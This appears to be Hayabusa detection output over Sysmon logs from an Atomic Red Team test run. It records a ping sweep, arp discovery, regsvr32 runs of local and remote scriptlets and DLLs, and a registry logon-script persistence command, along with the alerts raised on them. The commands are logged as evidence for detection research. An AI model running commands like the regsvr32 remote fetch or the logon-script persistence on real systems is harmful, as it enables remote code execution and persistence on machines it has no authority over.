MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D96A-5D31-0000-0010A3633700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.233 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D96B-5D31-0000-001090663700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.234 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D96B-5D31-0000-00107C693700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.235 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D96C-5D31-0000-00106A6C3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.236 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-D96C-5D31-0000-0010BA763700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.237 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3228 | PGUID: 747F3D96-D96D-5D31-0000-0010A7793700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.238 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D96D-5D31-0000-0010937C3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.239 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D96D-5D31-0000-0010827F3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.240 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D96E-5D31-0000-00106E823700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.241 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D96F-5D31-0000-00105A853700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.242 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3556 | PGUID: 747F3D96-D96F-5D31-0000-0010C78F3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.243 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3788 | PGUID: 747F3D96-D970-5D31-0000-0010B4923700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.244 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D970-5D31-0000-0010A0953700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.245 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2700 | PGUID: 747F3D96-D971-5D31-0000-00108C983700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.246 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 352 | PGUID: 747F3D96-D971-5D31-0000-0010789B3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.247 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3120 | PGUID: 747F3D96-D972-5D31-0000-00106BA43700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.248 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6976 | PGUID: 747F3D96-D972-5D31-0000-001057A73700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.249 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D973-5D31-0000-0010A3AA3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.250 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5100 | PGUID: 747F3D96-D973-5D31-0000-00108FAD3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.251 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D974-5D31-0000-00107BB03700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.252 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D974-5D31-0000-001068B33700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.253 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D974-5D31-0000-001006BD3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.254 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1624 | PGUID: 747F3D96-D975-5D31-0000-001099C23700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6412 | PGUID: 747F3D96-D976-5D31-0000-00104AC63700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6292 | PGUID: 747F3D96-D976-5D31-0000-0010DBCC3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Network Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: arp -a | Process: C:\Windows\System32\ARP.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D976-5D31-0000-001034CF3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D976-5D31-0000-0010D8D53700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4444 | PGUID: 747F3D96-D976-5D31-0000-001041E83700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2332 | PGUID: 747F3D96-D976-5D31-0000-001093EA3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 3848 | PGUID: 747F3D96-D977-5D31-0000-00100A0E3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1476 | PGUID: 747F3D96-D977-5D31-0000-0010771B3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D978-5D31-0000-0010442F3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6152 | PGUID: 747F3D96-D978-5D31-0000-00101E7A3800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-D97A-5D31-0000-00105DA83800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7148 | PGUID: 747F3D96-D97A-5D31-0000-001089BD3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49728 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,../hayabusa-rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3564 | PGUID: 747F3D96-D97A-5D31-0000-00109DDC3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D97A-5D31-0000-001019DE3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4628 | PGUID: 747F3D96-D97A-5D31-0000-00102BE33800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | LID: 0x50951 | PID: 5788 | PGUID: 747F3D96-D97B-5D31-0000-00109DEB3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D97B-5D31-0000-0010F0F03800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4240 | PGUID: 